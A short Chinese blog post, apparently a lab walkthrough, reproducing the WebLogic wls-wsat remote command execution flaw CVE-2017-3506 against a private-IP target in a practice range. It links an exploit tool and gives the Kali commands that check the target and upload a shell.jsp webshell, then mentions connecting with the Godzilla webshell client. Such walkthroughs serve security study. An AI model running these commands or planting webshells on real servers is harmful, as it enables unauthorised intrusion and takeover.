0
点赞
收藏
分享

微信扫一扫

【精选】WebLogic-CVE-2017-3506

下载地址:

https://github.com/Al1ex/CVE-2017-3506icon-default.png?t=N7T8https://github.com/Al1ex/CVE-2017-3506

1.weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

复现:

┌──(root💀kali)-[~/routing/红日2/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar

先进行检测下漏洞是否存在

┌──(root💀kali)-[~/routing/红日2/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.129:7001

2.burp抓包

记得要在WebLogic-XMLDecoder.jar文件中的目录下进行执行,要不然会报错

proxychains -f /etc/proxychains4.conf java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.129:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp

用123替换下burp里面的内容,然后进行测试下

3.哥斯拉连接

我们再访问下

举报

相关推荐

0 条评论